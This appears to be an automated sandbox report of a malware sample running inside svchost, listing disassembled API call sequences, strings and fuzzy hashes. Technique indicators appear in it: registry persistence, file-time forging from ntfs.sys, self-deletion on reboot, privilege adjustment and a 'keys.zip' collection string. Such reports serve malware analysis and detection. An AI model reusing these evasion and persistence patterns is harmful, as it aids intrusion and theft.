                                                                                                                                                                                                                • String ID: Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0Wu$keys.zip$path.txt
                                                                                                                                                                                                                • API String ID: 2697826820-149072808
                                                                                                                                                                                                                • Opcode ID: c003d2b60ba51930d3c76044eae71a68be9743cd747881805ff575bce5119761
                                                                                                                                                                                                                • Instruction ID: b536adbb3e2b29c4a9e3c37d333552d1454cbbda98eefc32dd8ab101ba52959a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c003d2b60ba51930d3c76044eae71a68be9743cd747881805ff575bce5119761
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B41233194474A4FCB2ACB3C98657EA7BF5EF4A340F1585E4D9CAD7240EB719948C780
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BC4902
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BC491A
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BC4941
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(00000000,-0000000B,00000104), ref: 02BC496F
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(-0ABB61A1,software\microsoft,00000000,00000102,00000000), ref: 02BC49CE
                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(00000000,00000000,00000000,00000001,00000000,00000001), ref: 02BC49FE
                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(00000000), ref: 02BC4A0C
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 02BC4A1A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AdminCloseFlushOpenUserValuelstrcpynmemsetstrstr
                                                                                                                                                                                                                • String ID: software\microsoft
                                                                                                                                                                                                                • API String ID: 1783443066-3673152959
                                                                                                                                                                                                                • Opcode ID: 7b905e4df933b5df2b0d52c27ae2fc1f2d62af18101dae220ed712ea72695774
                                                                                                                                                                                                                • Instruction ID: 125ec3e8b7df970167459bf06ff61ae1f6c4ed932a4c7ec44b39123f9f7e0629
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b905e4df933b5df2b0d52c27ae2fc1f2d62af18101dae220ed712ea72695774
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC314431A0021DAFDB26CB24DC19BEA7BB8EB05305F1001D8EB55AB140D7B09B48CBA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 004014C8
                                                                                                                                                                                                                • memset.MSVCRT ref: 004014EE
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,00402CFF,00000104,?,?,?,00000000,00000000,00000000), ref: 00401506
                                                                                                                                                                                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 00401529
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040154A
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00401557
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(?,00402CFF,?,?,?,00000000,00000000,00000000), ref: 0040156E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 0040157B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
                                                                                                                                                                                                                • String ID: D
                                                                                                                                                                                                                • API String ID: 2248944234-2746444292
                                                                                                                                                                                                                • Opcode ID: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                                • Instruction ID: 14e7369bd1a15e27c4b274561f890c179ee839510f861d06d6d7e351d84cbd4c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce458dfe1c04613ef12f54a39762905d76d3e86305e9e66b4aeea111f9933b52
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BF2167B290020C6FDB10DFE8DD84ADF7BBCAB94355F00457AFA05FA240D6349A458BA4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7752), ref: 02BD2827
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000,?,?), ref: 02BD2867
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?), ref: 02BD2871
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD2879
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD288A
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?), ref: 02BD2891
                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNEL32(?,?,?), ref: 02BD289E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DirectoryErrorLastPath$AdminBackslashCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                                • String ID: 617D7752$keys.zip
                                                                                                                                                                                                                • API String ID: 4256651433-3432394889
                                                                                                                                                                                                                • Opcode ID: 80a3ac3e37f2c736f2f3ea7e7fc5a011d53795ae5b0c8d604ac3cdfe8aeec547
                                                                                                                                                                                                                • Instruction ID: 01bc7ae2ce25d04de7033877c2fd001da7a8103ffaf1952789f26f4e81343f12
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80a3ac3e37f2c736f2f3ea7e7fc5a011d53795ae5b0c8d604ac3cdfe8aeec547
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 532137749407898BCB218B389858BEB7BE8EF45340F1489E4EE86C7201EB71E950CB90
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateFileA.KERNEL32(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C05
                                                                                                                                                                                                                • GetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?,?,?), ref: 00401C1F
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C35
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C46
                                                                                                                                                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C62
                                                                                                                                                                                                                • SetFileTime.KERNEL32(00000000,?,?,00402CA7,?,?,?,?,?,00402CA7,?), ref: 00401C78
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402CA7,?), ref: 00401C8E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402CA7,?), ref: 00401C9F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • \\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401C00
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileHandle$CloseCreateInformationTime
                                                                                                                                                                                                                • String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys
                                                                                                                                                                                                                • API String ID: 1046229350-2760794270
                                                                                                                                                                                                                • Opcode ID: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                                • Instruction ID: 0895f171d82555aaaa5436e0262d4f4d844cfaf0768df501368bcb823c663742
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c78bbbd609582fa450ae599ee540afb2fc557391311a346b79caf6ae330784a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE21F9729452187BF7219B50DD09FEF7B6CAF44710F148226FF01B61D0D778964586AC
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GlobalFindAtomA.KERNEL32(Wed Jul 6 06:49:26 20112,?,?,00402E9C), ref: 004028D9
                                                                                                                                                                                                                • GlobalAddAtomA.KERNEL32(Wed Jul 6 06:49:26 20112), ref: 004028EA
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 004028F6
                                                                                                                                                                                                                • RtlAdjustPrivilege.NTDLL(00000014,00000001,00000000,?), ref: 00402906
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 0040290C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AdminAtomGlobalUser$AdjustFindPrivilege
                                                                                                                                                                                                                • String ID: PnEw$Wed Jul 6 06:49:26 20112$explorer.exe$winlogon.exe
                                                                                                                                                                                                                • API String ID: 3001685711-2986670995
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,00000000), ref: 02BBFCCA
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,?,?,?,00001100,?,?,?,?,?,?,?,?,?), ref: 02BBFD7A
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BBFD96
                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?), ref: 02BBFDA5
                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,Content-Length,?), ref: 02BBFDFC
                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 02BBFE1D
                                                                                                                                                                                                                • memcpy.MSVCRT(?,?,?), ref: 02BBFE9F
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memcpy$_snprintf
                                                                                                                                                                                                                • String ID: 0$%x$Content-Length
                                                                                                                                                                                                                • API String ID: 4125937431-3838797520
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,?,?,?,?,02BB9F49,00000000,?,?,?,?,02BB9400,?,?), ref: 02BB9C41
                                                                                                                                                                                                                • MapVirtualKeyW.USER32(00000000,00000000), ref: 02BB9C5F
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000,?,?,?,?,02BB9F49,00000000,?,?,?,?,02BB9400,?,?), ref: 02BB9D2F
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000,?,?,?,?,02BB9F49,00000000,?,?,?,?,02BB9400,?,?), ref: 02BB9D51
                                                                                                                                                                                                                • SendMessageA.USER32(?,0000E2AD,00000000,00000000), ref: 02BB9D98
                                                                                                                                                                                                                • SendMessageW.USER32(?,?,00000003,00000000), ref: 02BB9DBE
                                                                                                                                                                                                                • PostMessageW.USER32(?,00000101,?,?), ref: 02BB9DCB
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$MutexReleaseSend$ObjectPostSingleVirtualWait
                                                                                                                                                                                                                • String ID: P0Wu
                                                                                                                                                                                                                • API String ID: 3783495248-465009422
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB5A60
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB5A8C
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB5AB3
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BB5AD4
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(000002B0,000003E8), ref: 02BB5B04
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(000002B0), ref: 02BB5B25
                                                                                                                                                                                                                • SetLastError.KERNEL32(?), ref: 02BB5B3E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                                • String ID: P0Wu
                                                                                                                                                                                                                • API String ID: 2971961948-465009422
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BB5B68
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB5B99
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB5BC5
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BB5BEC
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(000002B0,000003E8), ref: 02BB5C1D
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(000002B0), ref: 02BB5C3E
                                                                                                                                                                                                                • SetLastError.KERNEL32(?), ref: 02BB5C48
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                                • String ID: P0Wu
                                                                                                                                                                                                                • API String ID: 2971961948-465009422
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB69A2
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BB69C0
                                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,?,00000104), ref: 02BB69DD
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,?,?,?), ref: 02BB6A4D
                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(?,9E9388F8a,00000000,00000001,?,00000104), ref: 02BB6A6F
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 02BB6A7D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: memset$CloseOpenValuelstrcpyn
                                                                                                                                                                                                                • String ID: 9E9388F8a$software\microsoft
                                                                                                                                                                                                                • API String ID: 1287607259-1862788399
                                                                                                                                                                                                                • Opcode ID: 852e7a5757fe8ffaf044625ac1f196fdce60aa3dcbfcfd591d1e67be2d9947fe
                                                                                                                                                                                                                • Instruction ID: 333e9d3fe868d44870a1c9051d30b864e2d1ed92e265bd3d087039e5cf78d296
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 852e7a5757fe8ffaf044625ac1f196fdce60aa3dcbfcfd591d1e67be2d9947fe
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF21B5B1940208ABEB55DB74CCC9EEE77BCEF18704F5085E8E295D7141E6B09EC88B50
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetWindowLongA.USER32(02BBCE3A,000000F0), ref: 02BBE26B
                                                                                                                                                                                                                • GetLastActivePopup.USER32(02BBCE3A), ref: 02BBE279
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000005), ref: 02BBE293
                                                                                                                                                                                                                • GetWindow.USER32(00000000), ref: 02BBE296
                                                                                                                                                                                                                • GetWindowInfo.USER32(00000000,?), ref: 02BBE2AC
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000004), ref: 02BBE2B5
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000003), ref: 02BBE2EE
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$ActiveInfoLastLongPopup
                                                                                                                                                                                                                • String ID: <
                                                                                                                                                                                                                • API String ID: 3748940024-4251816714
                                                                                                                                                                                                                • Opcode ID: 6beb1d79dac8a498b150ff03e58f93da36e0fa0621210028c29a1f062ea7c6d1
                                                                                                                                                                                                                • Instruction ID: fa38084371705f11b52771540435dcac6ed2a32449c54d21f9b914d780291371
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6beb1d79dac8a498b150ff03e58f93da36e0fa0621210028c29a1f062ea7c6d1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6211E671E4022556DB32AA999C88BFEB75CEF403A5F8405A1FB41E71A0DBA0D45187E4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BBD860,00000000,00000000,00000000), ref: 02BBD8A4
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000,?,?,02BB9D7A,?,?,?,?,02BB9F49,00000000,?,?,?,?,02BB9400), ref: 02BBD8BC
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,02BB9D7A,?,?,?,?,02BB9F49,00000000,?,?,?,?,02BB9400,?), ref: 02BBD8CD
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,02BB9D7A,?,?,?,?,02BB9F49,00000000,?,?,?,?,02BB9400), ref: 02BBD8DC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BBD910
                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 02BBD917
                                                                                                                                                                                                                • PostMessageA.USER32(?,00000215,00000000,00000000), ref: 02BBD92B
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$CloseCreateInformationMessageMutexObjectPostReleaseSingleThreadWaitWindow
                                                                                                                                                                                                                • String ID: P0Wu
                                                                                                                                                                                                                • API String ID: 731183410-465009422
                                                                                                                                                                                                                • Opcode ID: 2c3422a4a03deaaa73ae56fb0effdffe2829beab1da658f07ea447d537737af3
                                                                                                                                                                                                                • Instruction ID: 96c64e46ff88d819774451b82fa4234a10183e546d8466ce4a33770c12b9722e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c3422a4a03deaaa73ae56fb0effdffe2829beab1da658f07ea447d537737af3
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B11E130A81614ABE7618F64DC0DFEA37E8EF08B51F5446E4FB04AB2D1C7F865108BA4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • StrCmpNIA.SHLWAPI(00000001,?,00000000,HTTP/1.,00000007,?,02BBFCE7,00000000,?,02BBFCE7,,-057FF5C8,00000000,00000000,02BBFCE7,?), ref: 02BBF0CD
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                • String ID: $Connection$Content-Length$HTTP/1.$Proxy-Connection$Transfer-Encoding$chunked$close
                                                                                                                                                                                                                • API String ID: 0-1412996494
                                                                                                                                                                                                                • Opcode ID: 6be7ea1452281fd96f1f816f0108e47502214cbd83c968ec745303ae0b3b3b4b
                                                                                                                                                                                                                • Instruction ID: afcf1763f7a27cd820df0c2b889e016f01bce188ef54a459f63945d2e06a6677
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6be7ea1452281fd96f1f816f0108e47502214cbd83c968ec745303ae0b3b3b4b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 09712531E00206ABEB268E68CC41BFA7BA6DF54318F5488D9F946D7650E7F1D941CB90
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: callocexitfree
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3367576030-0
                                                                                                                                                                                                                • Opcode ID: 94c252897fda2b88fb08e77b8444af02fe155961b8d95860ddc28658f3faad90
                                                                                                                                                                                                                • Instruction ID: a8506eb30a948907720f85284b242b4ed1f92ba90abc5ff83915e04a16885d50
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 94c252897fda2b88fb08e77b8444af02fe155961b8d95860ddc28658f3faad90
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7617E75A00609AFDB21CF68C890BFE7BA5FF49754F104498ED169B340D7B0EA41CB90
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(00401CB0,?,0000001C), ref: 004012DF
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004012F5
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(?), ref: 00401302
                                                                                                                                                                                                                • GetTempPathA.KERNEL32(00000104,?,00000000), ref: 00401319
                                                                                                                                                                                                                • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 00401331
                                                                                                                                                                                                                • MoveFileExA.KERNEL32(?,?,00000001(MOVEFILE_REPLACE_EXISTING)), ref: 0040134D
                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 0040135C
                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 00401369
                                                                                                                                                                                                                • MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 0040137D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$MoveNamePathTemp$AttributesDeleteExistsModuleQueryVirtual
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2787354276-0
                                                                                                                                                                                                                • Opcode ID: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                                • Instruction ID: 42c1c782f055159cc2832ed009bcca8814697c7b1d580040d5fe2fedb3335bbb
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9164c7000edcc80bd832700f9075c338832eee041a947671531ff51fe6c52d9d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: D921CFB1950219AFEB10DBA0DD49FEA77BCFB48700F0046A9A709F6190E6749A44CFA4
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetThreadDesktop.USER32(?), ref: 02BB9350
